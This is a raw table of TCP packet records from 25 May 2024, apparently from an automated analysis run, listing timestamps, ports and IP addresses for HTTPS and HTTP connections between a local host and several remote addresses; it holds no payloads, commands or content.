May 25, 2024 21:30:11.328541040 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.328600883 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.344897032 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.344953060 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.345093966 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.345093966 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.345123053 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.345181942 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.350723982 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.350781918 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.350958109 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.350958109 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.351018906 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.351078033 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.357566118 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.357615948 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.357777119 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.357777119 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.357837915 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.357896090 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.366846085 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.366910934 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.366986990 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.367018938 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.367038012 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.367069006 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.378067970 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.378132105 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.378272057 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.378272057 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.378300905 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.378350019 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.388813972 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.388870955 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.389034986 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.389034986 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.389064074 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.389111042 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.409331083 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.409359932 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.409467936 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.409497023 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.409696102 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.415818930 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.415838003 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.415915012 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.415930033 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.416157961 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.428395987 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.428420067 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.428611040 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.428639889 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.428843975 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.437429905 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.437485933 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.437526941 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.437563896 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.437597990 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.437618971 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.443736076 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.443782091 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.443938017 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.443938017 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.443998098 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.444072962 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.457113028 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.457182884 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.457382917 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.457384109 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.457444906 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.457571030 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.469634056 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.469691038 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.469887018 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.469887018 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.469948053 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.470022917 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.479741096 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.479799032 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.479991913 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.479991913 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.480052948 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.480148077 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.498095036 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.498158932 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.498414993 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.498473883 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.498589039 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.502593040 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.502640009 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.502763033 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.502821922 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.502927065 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.516069889 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.516100883 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.516324043 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.516382933 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.516469002 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.532864094 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.533049107 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.533103943 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.533189058 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.533574104 CEST	49794	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.533636093 CEST	443	49794	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.700875044 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.700916052 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:11.701107025 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.701191902 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:11.701222897 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.224582911 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.224836111 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.225261927 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.225311041 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.225375891 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.225389957 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.761703968 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.761766911 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.761810064 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.761981964 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.761981964 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.761981964 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.762053967 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.762147903 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.778019905 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.778079033 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.778436899 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.778523922 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.778616905 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.864989996 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.865052938 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.865272999 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.865272999 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.865334988 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.865446091 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.907854080 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.907896042 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.908340931 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.908400059 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.908539057 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.938710928 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.938766003 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.939083099 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.939143896 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.939220905 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.966841936 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.966882944 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.967200994 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.967266083 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.967354059 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.994625092 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.994667053 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.994910002 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.994910002 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:13.994971991 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:13.995043039 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.015635967 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.015674114 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.015991926 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.016052961 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.016140938 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.035429001 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.035468102 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.035706997 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.035768032 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.035868883 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.059667110 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.059706926 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.059912920 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.059914112 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.059984922 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.060045004 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.081275940 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.081320047 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.081530094 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.081530094 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.081593037 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.081656933 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.091183901 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.091226101 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.091350079 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.091350079 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.091413021 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.091474056 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.101367950 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.101459026 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.101664066 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.101664066 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.101726055 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.101789951 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.112489939 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.112529993 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.112701893 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.112703085 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.112763882 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.112839937 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.121690035 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.121774912 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.122009039 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.122070074 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.122159958 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.131855011 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.131896973 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.132198095 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.132258892 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.132364035 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.141201973 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.141241074 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.141618967 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.141680956 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.141978979 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.151231050 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.151268959 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.151451111 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.151451111 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.151513100 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.151576042 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.162641048 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.162679911 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.162868977 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.162868977 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.162931919 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.163002014 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.183232069 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.183273077 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.183332920 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.183412075 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.183415890 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.183495998 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.194034100 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.194072008 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.194242954 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.194242954 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.194304943 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.194370031 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.206223011 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.206260920 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.206408024 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.206408978 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.206507921 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.206597090 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.215158939 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.215207100 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.215389013 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.215389013 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.215451002 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.215502024 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.228051901 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.228091002 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.228439093 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.228498936 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.228569031 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.233655930 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.233746052 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.233911991 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.233912945 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.233974934 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.234041929 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.242755890 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.242794991 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.242975950 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.242975950 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.243037939 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.243103981 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.254563093 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.254601955 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.254841089 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.254901886 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.254985094 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.276161909 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.276220083 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.276451111 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.276451111 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.276513100 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.276606083 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.288326025 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.288369894 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.288696051 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.288758039 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.288841963 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.302350998 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.302397013 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.302845955 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.302907944 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.303175926 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.318651915 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.318703890 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.318933010 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.318994045 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.319078922 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.325486898 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.325526953 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.325746059 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.325746059 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.325808048 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.325897932 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.330147982 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.330187082 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.330410957 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.330410957 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.330472946 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.330564022 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.337017059 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.337055922 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.337265015 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.337326050 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.337434053 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.354240894 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.354280949 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.354459047 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.354459047 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.354547977 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.354638100 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.370623112 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.370666027 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.370973110 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.371033907 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.371138096 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.383063078 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.383111000 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.383446932 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.383507967 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.383546114 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.383590937 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.383609056 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.383654118 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.383697033 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.383706093 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.383797884 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.383847952 CEST	49795	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.383876085 CEST	443	49795	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.464621067 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.464663982 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.464864016 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.464965105 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:14.464981079 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:14.859613895 CEST	49789	80	192.168.2.4	91.92.253.69
May 25, 2024 21:30:14.862629890 CEST	49797	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:14.918689013 CEST	80	49797	158.160.165.129	192.168.2.4
May 25, 2024 21:30:14.919033051 CEST	49797	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:14.919115067 CEST	49797	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:14.919148922 CEST	49797	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:14.971832037 CEST	80	49797	158.160.165.129	192.168.2.4
May 25, 2024 21:30:15.024869919 CEST	80	49797	158.160.165.129	192.168.2.4
May 25, 2024 21:30:15.170192957 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.170586109 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.171224117 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.171236992 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.171405077 CEST	49796	443	192.168.2.4	65.109.242.59
